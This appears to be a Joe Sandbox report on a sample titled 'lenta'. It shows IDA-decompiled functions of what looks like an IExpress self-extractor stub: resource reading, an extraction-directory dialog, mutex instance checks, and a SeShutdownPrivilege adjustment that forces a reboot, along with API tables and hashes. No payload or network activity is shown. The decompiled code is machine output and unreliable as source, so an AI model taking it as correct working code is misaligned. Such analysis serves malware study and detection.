0x00000000
0x01085dd0
0x01085dce
0x01085dca
0x01085dba
0x00000000
0x01085d00
0x01085dd9
0x01085e04
0x010861fe
0x01085e0a
0x01085e0c
0x01085e17
0x01085e17
0x01085e04
0x01086200
0x01086200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 01085CEE
GetModuleFileNameA.KERNEL32(01088B3E,00000104,00000000,?,?), ref: 01085DFC
CharUpperA.USER32(?), ref: 01085E3E
CharUpperA.USER32(-00000052), ref: 01085EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 01085F6F
CharUpperA.USER32(?), ref: 01085FA7
CharUpperA.USER32(-0000004E), ref: 01086008
CharUpperA.USER32(?), ref: 010860AA
CloseHandle.KERNEL32(00000000,01081140,00000000,00000040,00000000), ref: 010861F1
ExitProcess.KERNEL32 ref: 010861F8

Strings

", xrefs: 01085D78
", xrefs: 0108612D
RegServer, xrefs: 01085F66
:, xrefs: 01086118

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: a3329a9968a10c1e2d2ddc58abfe9da3dadf032acbda461b5a427ea58177ee6b
Instruction ID: a95843219b27a7d7ee67e591f94b8bfad017d25d29d846bfe99894b9021c9051
Opcode Fuzzy Hash: a3329a9968a10c1e2d2ddc58abfe9da3dadf032acbda461b5a427ea58177ee6b
Instruction Fuzzy Hash: 52D14671A0C6495EEF76BA3C8C483FE7FE1AB16304F4481EAC5C6C6186D67689828F45

Uniqueness

Uniqueness Score: -1.00%

Function 01081F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E01081F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x1089a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x1088004; // 0x4f5b7a6c
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E010844B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E01086CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E010844B9(0, 0x522, 0x1081140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E01081EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x01081f90
0x01081f90
0x01081f93
0x01081f98
0x01081fa4
0x01081fa7
0x01081fc5
0x01081fcd
0x01081fdb
0x01081ee5
0x01081eea
0x01081ef1
0x01081ef4
0x01081f0c
0x01081f2e
0x01081f3a
0x01081f46
0x01081f4d
0x01081f58
0x01081f60
0x01081f61
0x01081f62
0x01081f75
0x01081f80
0x01081f77
0x01081f77
0x00000000
0x01081f77
0x01081f64
0x01081f64
0x00000000
0x01081f64
0x01081f0e
0x01081f0e
0x01081f13
0x01081f13
0x01081f14
0x01081f14
0x01081f16
0x01081f17
0x01081f1a
0x01081f1f
0x01081f1f
0x01081f86
0x01081f8f
0x01081fcf
0x01081fd3
0x00000000
0x01081fd3
0x01081fa9
0x01081fb4
0x01081fbb
0x01081fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x01081fc3
0x01081f9a
0x01081f9a
0x01081fa2
0x01081fd9
0x01081fda
0x00000000
0x00000000
0x00000000
0x01081fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 01081EFB
OpenProcessToken.ADVAPI32(00000000), ref: 01081F02
ExitWindowsEx.USER32(00000002,00000000), ref: 01081FD3

Strings

SeShutdownPrivilege, xrefs: 01081F28

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: f7207dc45ed468f24ea3e642aabad5820feee2d3fe4e13fde91783b143c1ce19
Instruction ID: 52a24e9e3aea990fa5f1aee4b86013b2a5ff8b6d9cd64e3652aa301c1852b04c
Opcode Fuzzy Hash: f7207dc45ed468f24ea3e642aabad5820feee2d3fe4e13fde91783b143c1ce19
Instruction Fuzzy Hash: 69210771B4C205BFDB307AA59C49FBF76B8EF95B10F100019FAC2D6186D77984028760

Uniqueness

Uniqueness Score: -1.00%

Function 01086CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01086CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x01086cf7
0x01086d00
0x01086d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,01086E26,01081000), ref: 01086CF7
UnhandledExceptionFilter.KERNEL32(01086E26,?,01086E26,01081000), ref: 01086D00
GetCurrentProcess.KERNEL32(C0000409,?,01086E26,01081000), ref: 01086D0B
TerminateProcess.KERNEL32(00000000,?,01086E26,01081000), ref: 01086D12

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 253f69a0c51e0cdf62ecf24647a59fa9ad25ff66f41e431d0bb03b6b6534cf27
Instruction ID: 8d51685b206161c0bd7ab4c8f140ce2fc42c6b8c7afd5bf5318259bfa9615573
Opcode Fuzzy Hash: 253f69a0c51e0cdf62ecf24647a59fa9ad25ff66f41e431d0bb03b6b6534cf27
Instruction Fuzzy Hash: 96D0C932208108FBDF202BE1E80CA5D3F28EB48692F484012F3D983808CA3F44518B51

Uniqueness

Uniqueness Score: -1.00%

Function 01083210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E01083210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E010843D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x1089a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10891e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E010844B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x10891e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x10891e5 - 3;
						if(_t49 - 0x10891e5 < 3) {
							goto L32;
						}
						_t24 =  *0x10891e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x10891e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0108658A(0x10891e4, 0x104, 0x1081140);
								_t27 = E010858C8(0x10891e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x10891e4 - 0x5c;
									if( *0x10891e4 != 0x5c) {
										L30:
										_t30 = E0108597D(0x10891e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x10891e5 - 0x5c;
									if( *0x10891e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E010844B9(_t64, 0x54a, 0x10891e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x10891e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x10891e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x10891e4 - 0x5c;
						if( *0x10891e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x1089124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x1089a3c, 0x3e8, 0x1088598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E01084224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10887a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E010844B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0108321b
0x0108321e
0x01083221
0x0108343c
0x0108343e
0x0108343f
0x01083445
0x01083447
0x00000000
0x01083447
0x01083229
0x0108322a
0x0108322f
0x010833ec
0x010833f7
0x01083410
0x01083416
0x0108341d
0x0108342d
0x0108342d
0x01083438
0x00000000
0x01083438
0x01083237
0x01083243
0x01083243
0x01083246
0x010832ee
0x010832f4
0x010832f6
0x010833d4
0x010833d6
0x010833db
0x010833dc
0x010833de
0x010833df
0x01083370
0x01083372
0x00000000
0x01083372
0x010832fc
0x01083301
0x01083301
0x01083303
0x01083304
0x01083304
0x0108330a
0x0108330d
0x00000000
0x00000000
0x01083313
0x01083318
0x0108331a
0x01083331
0x01083332
0x0108333a
0x0108333d
0x0108337c
0x01083388
0x0108338f
0x01083394
0x01083396
0x010833a4
0x010833ab
0x010833b6
0x010833be
0x010833c3
0x010833c5
0x01083435
0x01083437
0x01083437
0x00000000
0x01083437
0x010833c7
0x010833c9
0x010833cc
0x00000000
0x010833cc
0x010833ad
0x010833b4
0x00000000
0x00000000
0x00000000
0x010833b4
0x01083398
0x01083399
0x0108339b
0x0108339c
0x0108339d
0x00000000
0x0108339d
0x0108334c
0x01083351
0x01083354
0x00000000
0x00000000
0x0108335c
0x01083362
0x01083364
0x00000000
0x00000000
0x01083366
0x01083367
0x01083369
0x0108336a
0x0108336b
0x00000000
0x0108336b
0x0108331c
0x01083323
0x00000000
0x00000000
0x01083329
0x0108332b
0x00000000
0x00000000
0x00000000
0x0108332b
0x0108324c
0x0108324c
0x0108324f
0x010832c8
0x010832ce
0x00000000
0x010832ce
0x01083251
0x01083256
0x00000000
0x00000000
0x01083271
0x01083277
0x01083279
0x01083298
0x0108329d
0x0108329f
0x00000000
0x00000000
0x010832b0
0x010832b6
0x010832b8
0x00000000
0x00000000
0x010832be
0x01083280
0x01083289
0x0108328e
0x00000000
0x0108328e
0x0108327b
0x00000000
0x0108327b
0x00000000

APIs

LoadStringA.USER32(000003E8,01088598,00000200), ref: 01083271
GetDesktopWindow.USER32 ref: 010833E2
SetWindowTextA.USER32(?,lenta), ref: 010833F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 01083410
GetDlgItem.USER32(?,00000836), ref: 01083426
EnableWindow.USER32(00000000), ref: 0108342D
EndDialog.USER32(?,00000000), ref: 0108343F

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010832E2, 010832E7, 01083331, 01083344, 0108335B, 0108336A
lenta, xrefs: 010833F1

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
API String ID: 2418873061-2740221168
Opcode ID: 92e0d3d79add8beefe8d6ac79403f0bb79064bf88b88bad82530d1fac9db559c
Instruction ID: 3a74182302b3bf0a974b39f1e916777e165ce1bb1428c231a2989c6d231132d7
Opcode Fuzzy Hash: 92e0d3d79add8beefe8d6ac79403f0bb79064bf88b88bad82530d1fac9db559c
Instruction Fuzzy Hash: BB51C27034D251AAEB727A2D9C8CFBF3999BBC5E54F008029F6C59A6C5CEA9D4018360

Uniqueness

Uniqueness Score: -1.00%

Function 01082CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E01082CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x1089a3c = __ecx;
				memset(0x1089140, 0, 0x8fc);
				memset(0x1088a20, 0, 0x32c);
				memset(0x10888c0, 0, 0x104);
				 *0x10893ec = 1;
				_t20 = E0108468F("TITLE", 0x1089154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x108858c = _t27;
					SetEvent(_t27);
					_t64 = 0x1089a34;
					if(E0108468F("EXTRACTOPT", 0x1089a34, 4) != 0) {
						if(( *0x1089a34 & 0x000000c0) == 0) {
							L12:
							 *0x1089120 =  *0x1089120 & _t65;
							if(E01085C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x1088a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x1088184 != 0) {
										__imp__#17();
									}
									if( *0x1088a24 == 0) {
										_t57 = _t65;
										if(E010836EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x1089a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x1089a34 & 0x00000100) == 0 || ( *0x1088a38 & 0x00000001) != 0 || E010818A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E01086517(_t57, 0x7d6, _t34, E010819E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E01082390(0x1088a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E010844B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0108468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x1088588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x1089a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E010844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E010844B9(0, 0x54b, "lenta", 0, 0x10, 0);
										L11:
										CloseHandle( *0x1088588);
										 *0x1089124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E010844B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x1089124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E01086CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x01082cb5
0x01082cbc
0x01082cc7
0x01082cc9
0x01082cd1
0x01082cd3
0x01082cd9
0x01082ce9
0x01082cf9
0x01082d0e
0x01082d15
0x01082d1c
0x01082ef3
0x00000000
0x01082d2d
0x01082d34
0x01082d3b
0x01082d40
0x01082d48
0x01082d59
0x01082d84
0x01082e1f
0x01082e1f
0x01082e2e
0x01082e41
0x01082e5a
0x01082e62
0x01082e6c
0x01082e6c
0x01082e75
0x01082e77
0x01082e77
0x01082e84
0x01082e8b
0x01082e94
0x00000000
0x01082e96
0x01082e96
0x01082e9e
0x01082ea2
0x01082eba
0x00000000
0x01082ece
0x01082ede
0x01082eed
0x00000000
0x00000000
0x00000000
0x00000000
0x01082eed
0x01082eef
0x01082eef
0x01082eef
0x01082eef
0x01082ea2
0x01082e86
0x01082e88
0x01082e88
0x01082e43
0x01082e48
0x00000000
0x01082e48
0x01082e30
0x01082e30
0x01082ef8
0x01082f01
0x00000000
0x01082f01
0x01082d8a
0x01082d8f
0x01082da1
0x00000000
0x01082da3
0x01082dae
0x01082db4
0x01082dbb
0x00000000
0x01082dca
0x01082dd3
0x01082df5
0x01082e02
0x00000000
0x00000000
0x00000000
0x00000000
0x01082dd5
0x01082dde
0x01082de3
0x01082e04
0x01082e0a
0x01082e10
0x00000000
0x01082e10
0x01082dd3
0x01082dbb
0x01082da1
0x01082d5b
0x01082d5b
0x01082d5d
0x01082d69
0x01082d6e
0x01082f06
0x01082f06
0x01082f06
0x01082d59
0x01082f18

APIs

memset.MSVCRT ref: 01082CD9
memset.MSVCRT ref: 01082CE9
memset.MSVCRT ref: 01082CF9

Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846A0
Part of subcall function 0108468F: SizeofResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846A9
Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846C3
Part of subcall function 0108468F: LoadResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846CC
Part of subcall function 0108468F: LockResource.KERNEL32(00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846D3
Part of subcall function 0108468F: memcpy_s.MSVCRT ref: 010846E5
Part of subcall function 0108468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010846EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 01082D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 01082D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01082DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 01082DBD
CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01082E0A

Part of subcall function 010844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
Part of subcall function 010844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554

Strings

EXTRACTOPT, xrefs: 01082D4D
TITLE, xrefs: 01082D09
VERCHECK, xrefs: 01082E54
INSTANCECHECK, xrefs: 01082D95
lenta, xrefs: 01082D04, 01082DD9, 01082DF0

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
API String ID: 1002816675-2993962200
Opcode ID: 9fabe89f459f9c3915fdf6c7f28a2c05f333a2d09ce726a0385a00b7b678cec3
Instruction ID: c3bf20bfd552c2899d42a9bbfdf39c893bc46fe7abd0ae94dd5c8ec91849fc47
Opcode Fuzzy Hash: 9fabe89f459f9c3915fdf6c7f28a2c05f333a2d09ce726a0385a00b7b678cec3
Instruction Fuzzy Hash: BD510A7034C3019AFB70BA689D49B7F3AD9EB95714F40407AF6C1D62C9DBB98441C725

Uniqueness

Uniqueness Score: -1.00%

Function 010834F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E010834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x10891d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x1088584 = _t35;
					E010843D0(_t35, GetDesktopWindow());
					__eflags =  *0x1088184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lenta");
					_t17 = CreateThread(0, 0, E01084FE0, 0, 0, 0x1088798);
					 *0x108879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E010844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x108858c);
					_t38 =  *0x1088584; // 0x0
					_t25 = E010844B9(_t38, 0x4b2, 0x1081140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x10891d8 = 1;
						SetEvent( *0x108858c);
						_t39 =  *0x108879c; // 0x0
						E01083680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x108858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x108879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x010834fb
0x010834fe
0x01083665
0x01083666
0x01083666
0x01083668
0x0108366e
0x0108366e
0x01083671
0x01083671
0x01083677
0x00000000
0x01083677
0x01083504
0x01083506
0x01083507
0x0108350c
0x0108365b
0x0108365f
0x00000000
0x00000000
0x00000000
0x01083661
0x01083512
0x01083515
0x010835be
0x010835c1
0x010835d1
0x010835d8
0x010835de
0x010835f8
0x01083617
0x01083617
0x01083623
0x01083637
0x0108363d
0x01083642
0x01083644
0x00000000
0x01083646
0x01083652
0x01083657
0x01083658
0x00000000
0x01083658
0x01083644
0x0108351b
0x0108351d
0x0108354f
0x01083553
0x00000000
0x00000000
0x0108355f
0x01083565
0x0108357c
0x01083581
0x01083584
0x0108359b
0x010835a1
0x010835a7
0x010835ad
0x010835b3
0x010835b8
0x00000000
0x010835b8
0x01083586
0x01083588
0x00000000
0x00000000
0x01083590
0x00000000
0x01083590
0x01083524
0x01083535
0x01083541
0x00000000
0x01083549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 01083535
EndDialog.USER32(?,?), ref: 01083541
ResetEvent.KERNEL32 ref: 0108355F
SetEvent.KERNEL32(01081140,00000000,00000020,00000004), ref: 01083590
GetDesktopWindow.USER32 ref: 010835C7
GetDlgItem.USER32(?,0000083B), ref: 010835F1
SendMessageA.USER32(00000000), ref: 010835F8
GetDlgItem.USER32(?,0000083B), ref: 01083610
SendMessageA.USER32(00000000), ref: 01083617
SetWindowTextA.USER32(?,lenta), ref: 01083623
CreateThread.KERNEL32 ref: 01083637
EndDialog.USER32(?,00000000), ref: 01083671

Strings

lenta, xrefs: 0108361D

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: lenta
API String ID: 2406144884-2780258678
Opcode ID: 2371f76659e2f040ae2ecc5793c43dd7420d7622018ecf29542aacdc831cc701
